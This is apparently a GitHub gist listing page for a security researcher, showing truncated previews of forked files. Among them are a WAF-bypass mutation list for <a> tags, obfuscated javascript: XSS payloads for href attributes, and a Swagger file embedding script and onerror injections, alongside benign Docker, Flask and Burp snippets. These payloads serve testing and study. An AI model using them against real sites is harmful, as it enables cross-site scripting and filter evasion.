These patterns look for sensitive information directly embedded in the code.
-
Generic Passwords / Secrets / Tokens:
- Regex:
- Regex:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: JSON param key as column name | |
| function: VIEW_FILTER | |
| location: PROXY_HTTP_HISTORY | |
| source: |+ | |
| /** | |
| * Extracts a JSON parameter and creates a column named after the parameter. | |
| * @author mrrootsec | |
| */ | |
| var req = requestResponse.request(); |
mrrootsec
/ README.md
Created
June 29, 2025 11:42
— forked from win3zz/README.md
Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools
mrrootsec
/ mutation_a.txt
Created
June 24, 2025 15:24
— forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
mrrootsec
/ href_bypass.html
Created
April 10, 2025 06:15
— forked from hackerscrolls/href_bypass.html
XSS payloads for href
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--javascript --> | |
| ja	vascript:alert(1) | |
| ja
vascript:alert(1) | |
| ja
vascript:alert(1) | |
| javascript:alert() | |
| <!--::colon:: --> | |
| javascript:alert() | |
| javascript:alert() | |
| javascript:alert(1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Docker Cheatsheet | |
| ## Tutorial series | |
| Get started with Docker: [https://docs.docker.com/engine/getstarted/](https://docs.docker.com/engine/getstarted/) | |
| ## Installation | |
| ### Linux |
mrrootsec
/ getRawPageContent
Created
January 14, 2025 16:44
— forked from henningpohl/getRawPageContent
Bookmarklet to crawl a page for iframes, embeds and links and render those as easy to access list.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(){ | |
| // http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/ | |
| // http://subsimple.com/bookmarklets/jsbuilder.htm | |
| if(window.jQuery === undefined) { | |
| var script = document.createElement("script"); | |
| script.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"; | |
| script.onload = script.onreadystatechange = function() { | |
| bookmarklet(); | |
| }; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, request, jsonify | |
| import os | |
| app = Flask(__name__) | |
| # Directory where uploaded files will be stored | |
| UPLOAD_FOLDER = './uploads' | |
| os.makedirs(UPLOAD_FOLDER, exist_ok=True) | |
| app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER |
mrrootsec
/ python-venv-tutorial.md
Created
November 14, 2024 05:33
— forked from ryumada/python-venv-tutorial.md
Python Virtual Environment Tutorial
mrrootsec
/ ponelat-evil-xss.swagger.json
Created
September 18, 2024 15:50
— forked from shockey/ponelat-evil-xss.swagger.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger" : "2.0", | |
| "info" : { | |
| "version" : "1.0.100", | |
| "title" : "title<script language=\"javascript\">alert('1')</script>", | |
| "description" : "description with **markdown** format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>" | |
| }, | |
| "tags" : [ { | |
| "name" : "Admin", | |
| "description" : "tag with **markdown**" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class MouseSimulator { | |
| [DllImport("user32.dll", SetLastError = true)] | |
| private static extern void mouse_event(uint dwFlags, int dx, int dy, uint dwData, int dwExtraInfo); | |
| private const uint MOUSEEVENTF_MOVE = 0x0001; | |
NewerOlder